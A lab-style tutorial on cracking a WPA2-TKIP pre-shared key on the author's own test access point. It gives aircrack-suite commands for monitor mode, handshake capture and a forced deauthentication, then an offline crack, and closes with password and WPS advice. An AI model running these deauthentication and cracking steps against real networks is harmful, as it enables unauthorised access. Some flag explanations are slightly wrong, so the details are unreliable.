We are going to skip WPA and go straight to WPA2 TKIP because if we can crack WPA2 we can crack WPA..
What does WPA stand for?
Wi-Fi Protected Access
How did it come about?
Well if you were following the previous lessons you will see that the other security protocols are extremely vulnerable and trivial to crack or bypass so the Wi-Fi Alliance defined these in response to the previous research that uncovered these vulnerabilities.
WPA is more secure than WEP though so why should I be worried?
Well nothing is really as secure as we think, nothing is bulletproof or 100% secure and plenty of 0-days exist out there that already bypass these that we don’t know about, we will go though some of the known vulnerabilities that exist and can be easily carried out in order to crack the password using different methods.
What if my password is really long?
Well if you are using a 64 character password congratulations you are a lot more secure than most people out there but if someone really wants you they will get you. If your router has Wi-Fi Protected Setup (WPS) though your 64 character password has become 4 numbers and will be trivial to crack so if you have WPS disable it and if you disabled it and you can still crack it you should obtain a different router. We will look at this in a future lesson.
Now that we have discussed a little bit about WPA let’s get move on with the lesson and crack it, as always modify your access point settings to replicate the image below:As always put your card into monitor mode
airmon-ng start wlan0 6
Now that you have put your card into monitor mode you need to start airodump-ng in order to capture the traffic from the access point.
airodump-ng –bssid 00:18:E7:XX:XX:XX –channel 6 -w testcapture mon0Output looks like thisYou can see the following from the above output
BSSID is the access point MAC address
STATION is a client either authenticated or looking for an access point if not associated with a BSSID
CH or channel is set to 6
ENC or encryption type is set to WPA2
CIPHER is set to TKIP
AUT or authentication is set to PSK aka Pre-Shared Key or Personal Mode
ESSID or the name of the access point is set to “test”
Now we are looking for the four-way handshake and this can be accomplished in two different ways here with number one just waiting for a client to connect and number two sending a de-authentication packet to the client forcing it to reconnect and obtaining the handshake that way, we are going to focus on number tow in this scenario.
aireplay-ng -0 2 -a 00:18:E7:XX:XX:XX -c F4:09:D8:XX:XX:XX mon0
-0 means deauthentication
-1 is the number of deauths to send
-a is the MAC address of the AP MAC
-c is the MAC of the client you are de-authenticatingNow if you check back in your airodump-ng output you will now see that you have obtained the handshakeAt this point you can kill airodump-ng as you have the handshake but to verify you have captured either the full four parts of the handshake or at the minimum two parts fire up wireshark and take a look.
wireshark your_capture_file.cap &Use the filter eapol and click “Apply” to see only the eapol packets as these contain your handshakeNow it’s just a case of running aircrack-ng against the capture and cracking the password associated with it, in this case in order to speed it up I am going to create a little list so that we don’t have to wait around for ages waiting to see if we can crack it especially as we already know the password!
aircrack-ng -b 00:18:E7:XX:XX:XX testcapture*.cap
Even WPA/WPA2 can be easily broken, all it takes is an attacker with some patience to passively monitor the air and get your four-way handshake or alternatively actively de-authenticate you in order to obtain the four-way handshake and then either by uploading to a cloud cracker or using their own GPU/cloud cracker they can crack your key and just leave the cracker running without having to be near your access point. Once the four-way handshake has been obtained that is all that is required in order to break your key off-site and depending on the attackers resources and the strength of your password this can take anywhere from a few minutes to months or even years but it will eventually be broken. Best use an extremely long password in order to mitigate against this form of attack.